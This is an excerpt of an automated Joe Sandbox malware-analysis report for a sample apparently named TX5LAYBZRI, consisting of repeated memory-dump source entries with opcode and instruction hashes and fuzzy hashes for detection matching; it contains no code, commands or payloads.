                                            • Instruction ID: 83e04ead97ecfab842b32efa3409d0dda0cbd0588d593ef691927f796129b38d
                                            • Opcode Fuzzy Hash: e2e1976e7aa696d8f1bdba17588b8d0c4f881f40c5308149a345eed4947ecea7
                                            • Instruction Fuzzy Hash: E9C080F111D201BFC70C8714D855B2F77D8DB44355F13581CB046C1190EA345990CF1B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ZXP
                                            • API String ID: 0-2878008129
                                            • Opcode ID: 3254acbb7fab6560dc10e1fe2c7f49f977c8e012a46edb01f61b943b158999e5
                                            • Instruction ID: 7a2ce7aaf563ec62842412d9e15b4970f7249b7bf5ae50c756251b66c7aa13ea
                                            • Opcode Fuzzy Hash: 3254acbb7fab6560dc10e1fe2c7f49f977c8e012a46edb01f61b943b158999e5
                                            • Instruction Fuzzy Hash: C1418EEB12D175BC7651E58A2B14AFBA76DE1C7778B308827F807D540AE2C40E4F2132
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ZXP
                                            • API String ID: 0-2878008129
                                            • Opcode ID: 351653bc3b329b2f62834bcd02c9460fecab7f2d5782598291e5f0e6afb9b0c7
                                            • Instruction ID: f4b0c42e9bdffad37bf0e8277891a595d21689c1d34788a6a085b28f7f777a4a
                                            • Opcode Fuzzy Hash: 351653bc3b329b2f62834bcd02c9460fecab7f2d5782598291e5f0e6afb9b0c7
                                            • Instruction Fuzzy Hash: B0419FEB12D134BCB651E18A2B14AFBA76ED1C7778B308827F807D510AD2D80E4F6132
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2137568261.0000000000B91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_b90000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: 71f3587028c2138a4e931197f7384bd4a6548196459e5a4ff6bbb4f534adf2c8
                                            • Instruction ID: 9596a427673ed9afe7ad73d2d077fe187c2452fd9f7be0e0d6fbab24c684847b
                                            • Opcode Fuzzy Hash: 71f3587028c2138a4e931197f7384bd4a6548196459e5a4ff6bbb4f534adf2c8
                                            • Instruction Fuzzy Hash: B83197B49053059FCB00EFB8CA8569EBBF4AF44744F008869E894E7340E734DA44DF52
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 51d2015e73ac9e5ab5ff5a23ef881d31d8c12e6472634f209e16e5d5991003e2
                                            • Instruction ID: f74c496299e64f5ab06fee538660c30a11eec5affdc5a682382d778209b21a2d
                                            • Opcode Fuzzy Hash: 51d2015e73ac9e5ab5ff5a23ef881d31d8c12e6472634f209e16e5d5991003e2
                                            • Instruction Fuzzy Hash: 51B149FB529125BDB651E18A6B18BFB676DE2C7738F308827F803D150AD2D80A4F6131
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a2253c5c7ceb05dd47922a775991d8fff11cebcd268e9c5315390c4035835180
                                            • Instruction ID: 3158bca9f5633e0e4dccfa3fdc4ce3abbdb577729a5f8308115df9f8dec50fe3
                                            • Opcode Fuzzy Hash: a2253c5c7ceb05dd47922a775991d8fff11cebcd268e9c5315390c4035835180
                                            • Instruction Fuzzy Hash: 35B17AEB52D125BDB651E1896F18AFB676DE2C7738F308827F803D150AD2D90A4F6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 658592587f22b4c405a5c8801a3f01406e2d47b89f23ab9cca283d93513bc446
                                            • Instruction ID: fc77c07ccd463cfac203fd3fe932443fc020d660ebbda2a162139422b7699f2a
                                            • Opcode Fuzzy Hash: 658592587f22b4c405a5c8801a3f01406e2d47b89f23ab9cca283d93513bc446
                                            • Instruction Fuzzy Hash: 51B148EB52D125BDB611E58A6B14BFB676DE2C7738F308827F803D150AD2D90A4F6131
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1dceddd496d8025665e30a201ca2390a860b106f11eddc664ce2b9b70d018d2c
                                            • Instruction ID: a5541bff12cf6db47d4b05ff53c07d5e4a751b3a5e9b988e809e9f875652b1f2
                                            • Opcode Fuzzy Hash: 1dceddd496d8025665e30a201ca2390a860b106f11eddc664ce2b9b70d018d2c
                                            • Instruction Fuzzy Hash: 44A149EB52D125BDB651E18A6B18BFB676DE2C7738F308827F803D150AD2D90A4F6131
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5c3f97860e1180c33d0f4bd8090afb6a59dbfce32414220d340c8e89cc7541f7
                                            • Instruction ID: 3292a347b9d118a8176341d01c53d15eba3f493a88037db8a0068ca0c2a2df49
                                            • Opcode Fuzzy Hash: 5c3f97860e1180c33d0f4bd8090afb6a59dbfce32414220d340c8e89cc7541f7
                                            • Instruction Fuzzy Hash: 3FA148EB52D125BCB651E18A6F14AFBA76DE2C7738B30C827F803D150AD2D90A4F6131
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a7da220fbcbc2acb52a2a3d4fe2711f75e48bb56f2c3aa4302d3c62b0eab0417
                                            • Instruction ID: 677286bbcce483b3dc97366184545f67f2dddfb066fff0cc4c4850df673e1a8f
                                            • Opcode Fuzzy Hash: a7da220fbcbc2acb52a2a3d4fe2711f75e48bb56f2c3aa4302d3c62b0eab0417
                                            • Instruction Fuzzy Hash: 4FA149EB52D125BDB651E18A6F14AFB676DE2C7738F308827F803D150AD2D90A4F6131
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f8db184e895f76cd601aff26058f86dc312866a914f03b77f4da2c595049e0f3
                                            • Instruction ID: 7364a4dd42f3b49a6945f5491326d1e728b5029792f26da3d726ffbc8f29f3ce
                                            • Opcode Fuzzy Hash: f8db184e895f76cd601aff26058f86dc312866a914f03b77f4da2c595049e0f3
                                            • Instruction Fuzzy Hash: 5CA138EB52D125BCB651E18A6F14AFBA76DE2C7738F308827F807D150AD2D90A4F6131
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 909c12ff6e9e1740b91e7244f2e657db62e646d5904a393498e51193ac7d1254
                                            • Instruction ID: c3316d7b63c7db05285748a1f24ab992b2ebf5dd6a366da628089507e8f92d12
                                            • Opcode Fuzzy Hash: 909c12ff6e9e1740b91e7244f2e657db62e646d5904a393498e51193ac7d1254
                                            • Instruction Fuzzy Hash: AEA12AEB52D125BCB651E18A6F14AFB676DE2C7738B30C827F807D150AD2D90A4F6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 35dc9b56798bee9d4afac1af73c0334b1637df8f998d3788ec6bcbc595cf4633
                                            • Instruction ID: 022e4c282329d0547bad1c37c9a007be02b41f6fcb9407e8dbe94ba59880b6af
                                            • Opcode Fuzzy Hash: 35dc9b56798bee9d4afac1af73c0334b1637df8f998d3788ec6bcbc595cf4633
                                            • Instruction Fuzzy Hash: 56913BEB52D125BCB651E18A6F14AFB676DE2C7738B30C827F803D150AD2D54A4F6131
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0927f5217055c72fa05e44e83b4dfa616265fb404e9428b8c1a186631f83816f
                                            • Instruction ID: 364a8d90542c992a66afcfdd03ac320f154baaf54e5f7431de4814ba4bf51e56
                                            • Opcode Fuzzy Hash: 0927f5217055c72fa05e44e83b4dfa616265fb404e9428b8c1a186631f83816f
                                            • Instruction Fuzzy Hash: 399129EB52D125BCB651E18A6B14AFB676DE2C7738B30C827F807D150AE2D90A4F6131
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6bd0d3b0fa3c157eff73b46ae0730c426051fb755b74a81569b88da0c1938f3c
                                            • Instruction ID: e69e2b9e857d510e0dfe113598097fcf02d9b641b0208501e9befa94d4a64715
                                            • Opcode Fuzzy Hash: 6bd0d3b0fa3c157eff73b46ae0730c426051fb755b74a81569b88da0c1938f3c
                                            • Instruction Fuzzy Hash: 509108EB52D125BCB651E18A6B14EFB676DE2C7738B30C827F807D150AD2D90A4F6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7966fe3e4c6e3e0b13e1a35d0d92dbe2b0f365b34bfd92c820f9315a918fe4b4
                                            • Instruction ID: a1383817d7d7da410122a76663dce6c08ebd9b55a479040dbdd824145dae5548
                                            • Opcode Fuzzy Hash: 7966fe3e4c6e3e0b13e1a35d0d92dbe2b0f365b34bfd92c820f9315a918fe4b4
                                            • Instruction Fuzzy Hash: 3E9119EB52D125BCB651E18A6B14EFB676DE2C7738B30C827F807D140AD2D90A4F6131
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ce4eebff34784425680fa149db17a3bc17c164a7e9e35c8aa208e8154b9b0ba4
                                            • Instruction ID: f59f4186e6339c8aa0e8297f969c07da57aef76a1c4b7ab15a1e5c8ed6d03fe1
                                            • Opcode Fuzzy Hash: ce4eebff34784425680fa149db17a3bc17c164a7e9e35c8aa208e8154b9b0ba4
                                            • Instruction Fuzzy Hash: 138107EB12D125BCB551E18A6B24EFB676DE1C7738B30C827F807D150AE2D94A4F6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 472c59ad3a1d7c18140899f2969788a8d2528673491e0d4241d2bb061e61de2e
                                            • Instruction ID: a2ad72eb15d66b57334789fe8d35f1a3936c61fdc7334c3ef467ebb4dd411b21
                                            • Opcode Fuzzy Hash: 472c59ad3a1d7c18140899f2969788a8d2528673491e0d4241d2bb061e61de2e
                                            • Instruction Fuzzy Hash: 728119EB56D125BCB651E18A6F14EFBA76DE1C7738B308827F807D140AE2D50A4F6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c11f3c5f3cc22eda1d2912085596f2b8c948e252a02bb4ddee242d4221ee1a8e
                                            • Instruction ID: 67d0585c1fe32ab02187a3150aa2fc0784580584e1400294f7c248d9ff28ef85
                                            • Opcode Fuzzy Hash: c11f3c5f3cc22eda1d2912085596f2b8c948e252a02bb4ddee242d4221ee1a8e
                                            • Instruction Fuzzy Hash: 5D7139EB52D125BCB651E18A6B24EFB676DE1C7738B30C827F807D140AE2D54A4F6131
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 46673f9f1453e3758a0ec9524ba64e3bdf496af07418b4292ae44030023b4cc5
                                            • Instruction ID: 6cbd22c9c0c5f874cc5fd545af290a50c08e686f9f0114b38b1d6b09478d36f1
                                            • Opcode Fuzzy Hash: 46673f9f1453e3758a0ec9524ba64e3bdf496af07418b4292ae44030023b4cc5
                                            • Instruction Fuzzy Hash: D07128EB16D135BCB651E18A6B14EFB676EE1C7738B308827F807D150AE2D90A4F6131
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7407ccf2c25a4b4a5dd8756108ee3f763ec91f5f295bada73fc4d6dfd56faedc
                                            • Instruction ID: 3fd7ca72db885056c7c84c452c55dc7823a10ec137c7d2dd7a71f362aacfd4bb
                                            • Opcode Fuzzy Hash: 7407ccf2c25a4b4a5dd8756108ee3f763ec91f5f295bada73fc4d6dfd56faedc
                                            • Instruction Fuzzy Hash: 487129EB16D125BCB651E58A6F14EFB676DE2C7738B308827F807D140AD2D50A4F6131
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8bcd478fc5dcb9c85ac6e3d92dae1cd526d54c26bc081978021b6f561bc8ce99
                                            • Instruction ID: 0949196bf1d9524b04d4b4955235675fcfc7cb6c3ef5e0a7bf2e71eda3863c19
                                            • Opcode Fuzzy Hash: 8bcd478fc5dcb9c85ac6e3d92dae1cd526d54c26bc081978021b6f561bc8ce99
                                            • Instruction Fuzzy Hash: 11715AEB52D125BCB651E14A2F24EFB676DE1C7738B308827F807D150AE2D90A4F6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 389c8403ed11888ab5b31a1d1492a8a34c1feee5178eb806f98262ded58b46b1
                                            • Instruction ID: f875e884a5ebd875cdd38f500ed64e08d5a31c688b10b3b50e6f8808a4526f01
                                            • Opcode Fuzzy Hash: 389c8403ed11888ab5b31a1d1492a8a34c1feee5178eb806f98262ded58b46b1
                                            • Instruction Fuzzy Hash: 3E7117EB12D125BCB651E54A6B24EFB676DE1C7738B318827F807D250AD2D40A4F6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f69d5cd80bc3bee6bc42ca8749c3e30b9fb0ab62d3ecd9404329deb0d2ba7ab4
                                            • Instruction ID: 931a75a5b035df604774abf536a0083ad4b4e31f539af8f081f986e3bb7b25e8
                                            • Opcode Fuzzy Hash: f69d5cd80bc3bee6bc42ca8749c3e30b9fb0ab62d3ecd9404329deb0d2ba7ab4
                                            • Instruction Fuzzy Hash: 166118EB12D125BCB651E54A6F24EFB676DE1C7738B308827F807D150AE2D44A4F6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 777c53ff4f817eeccb073a62bd627235cb17d65c34aad12c1670a19751f9877f
                                            • Instruction ID: 62d7c391280f6a5799836aa539d18ebe4b9eaf4b4d9f721c49cf9d88ce941594
                                            • Opcode Fuzzy Hash: 777c53ff4f817eeccb073a62bd627235cb17d65c34aad12c1670a19751f9877f
                                            • Instruction Fuzzy Hash: EB61F7EB22D125BC7551E18A2F24EFB676EE1C7738B318827F807D150AE2C90A4F2131
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a85339cd777d8f4ebfc02839f6aea069fca030fa206c27a002fc86c32a4ad0e1
                                            • Instruction ID: 1eb825a2b5c04c4d98140734abffc66978027a27140c24faee5be2ce100c2f4a
                                            • Opcode Fuzzy Hash: a85339cd777d8f4ebfc02839f6aea069fca030fa206c27a002fc86c32a4ad0e1
                                            • Instruction Fuzzy Hash: 8361E7EB26D125BC7551E18A2B28EFB576EE1C7738B318827F807D150AE2C50A4F6131
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f0d0d5521e9c7c765eda87b50c0774f10f77dac8322e19bb30c8198afc948854
                                            • Instruction ID: b20943f49fba03a2bd5408530f8e31095ccc161d70a74a73762a9994b0e50411
                                            • Opcode Fuzzy Hash: f0d0d5521e9c7c765eda87b50c0774f10f77dac8322e19bb30c8198afc948854
                                            • Instruction Fuzzy Hash: F661F6EB22D125BC7551E54A6B24EFB676DE1C7738B31C827F807D140AE2D84A8F6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0490af792474d94b3a15345f3970f3d2c8b9064bd4095df147c659587f8f26fc
                                            • Instruction ID: 9df5be7d7c119fbe1696cb4407c0e4506978989c44d44ec2ad194223ed56cf07
                                            • Opcode Fuzzy Hash: 0490af792474d94b3a15345f3970f3d2c8b9064bd4095df147c659587f8f26fc
                                            • Instruction Fuzzy Hash: 4D61F6EB22D125BC7551E14A2B28EFB676DE1C7738B31C827F807D150AD2D90A8F6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f3631481640b8e29ea4683dafea387f2c16173166a568fbfd7a612c4a6b547ee
                                            • Instruction ID: 1613765e8a2d1e3ae71e5d5db693e743b0d80d0e6b5c1ba23dacc16d60786228
                                            • Opcode Fuzzy Hash: f3631481640b8e29ea4683dafea387f2c16173166a568fbfd7a612c4a6b547ee
                                            • Instruction Fuzzy Hash: 675128EB22D125BC7551E14A2B28EFB676EE1C7738B31C827F807D140AD2C40A8F6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: db1218e36f3c94d9fd27f0089bec3e12466db4ae68f688666d2f08067a1bc8f5
                                            • Instruction ID: 12b5b01dbda6f8319179b89b43a19a6f11033a95163d2369ffb8c80d905e2568
                                            • Opcode Fuzzy Hash: db1218e36f3c94d9fd27f0089bec3e12466db4ae68f688666d2f08067a1bc8f5
                                            • Instruction Fuzzy Hash: A451F8EB62D125BC7551E14A2B28EFB676DE1C7738B31C827F807D150AD2C94A8F6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2c346221a088b4326abdeec8216acc2aed66208f48d66fdd75e66fca1dcd4bca
                                            • Instruction ID: e1481b4045b168e7a653d4622831133d41ab48b7d9b25f555f35c4529adf78d7
                                            • Opcode Fuzzy Hash: 2c346221a088b4326abdeec8216acc2aed66208f48d66fdd75e66fca1dcd4bca
                                            • Instruction Fuzzy Hash: 565106EB22D125BC7651E58A2B18EFB676DD1C7738B30C827F807D140AD2D80A8F6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0952fa83cdf13bfb034f17981e0563d8f0a73760e44c74beb457538b7dd843b6
                                            • Instruction ID: b44ee131f0d4fc80a45ad72c9f2cbbfc11816f72f8f63185e17d81d739b87a8d
                                            • Opcode Fuzzy Hash: 0952fa83cdf13bfb034f17981e0563d8f0a73760e44c74beb457538b7dd843b6
                                            • Instruction Fuzzy Hash: 625119EB62D135BC7651E54A2B18EFB576EE1C7738B708827F807D140AD2D50A8F6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 76680b90e75902a1a5b26d689df9d340d008cc5702d76379b8144248846215a3
                                            • Instruction ID: 6fc9570f3ed6053aaaaa2ff1dbd4447a4a02c84385d6ef6eee1b74698bd2388a
                                            • Opcode Fuzzy Hash: 76680b90e75902a1a5b26d689df9d340d008cc5702d76379b8144248846215a3
                                            • Instruction Fuzzy Hash: 8A5106EB22D135BC7551E58A2B18EFB576ED1C7738B308827F807D140AD2D80A8F6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 45efceef920ec9a4ed08bc36ad69339c41ffe1a9c9f65f716db68fbd9e60b709
                                            • Instruction ID: db9b89997d520942db06c3b1a1e1957918a2d7e287654531ed0c54a470d23c48
                                            • Opcode Fuzzy Hash: 45efceef920ec9a4ed08bc36ad69339c41ffe1a9c9f65f716db68fbd9e60b709
                                            • Instruction Fuzzy Hash: FF418EEB52D175BCB652E5492B18EFB6B6ED1C7738B308827F807D510AD2D40A4F6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 52659ca61ffaa33bd489ff783e4196102b34d503ea1a22d6ff6aa97c8f7247f9
                                            • Instruction ID: 529108c0252d4a722d494353c72363e99d388bbb3ffdd18074ce61f9926deea7
                                            • Opcode Fuzzy Hash: 52659ca61ffaa33bd489ff783e4196102b34d503ea1a22d6ff6aa97c8f7247f9
                                            • Instruction Fuzzy Hash: 2B4129EB22D125BC7551E58A2B18EFA576EE1C7778B308827F807D140AD2D80E8B6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c0fd22c9eef4652f14eb440609906c4ebca196e30bad6abd10c1383e75f9c6a2
                                            • Instruction ID: 6185ae492284ab02c450a42390573e49f745104aa2c1ebf4c5b13f1a85f6e656
                                            • Opcode Fuzzy Hash: c0fd22c9eef4652f14eb440609906c4ebca196e30bad6abd10c1383e75f9c6a2
                                            • Instruction Fuzzy Hash: 84412AEB12D135BC7551E54A2B18EFA676EE1C7778B708C27F807D540AD2D40E8B6132
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2140438137.0000000007920000.00000040.00001000.00020000.00000000.sdmp, Offset: 07920000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7920000_TX5LAYBZRI.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b5e3551b98b8a443cd67111e8c3ae5362af98668708e76014e32a957eb002887
                                            • Instruction ID: b12d95c433d60c9ac4318a1035f38540ad29adb1322f5f7ff29720ff320ef8ae
                                            • Opcode Fuzzy Hash: b5e3551b98b8a443cd67111e8c3ae5362af98668708e76014e32a957eb002887
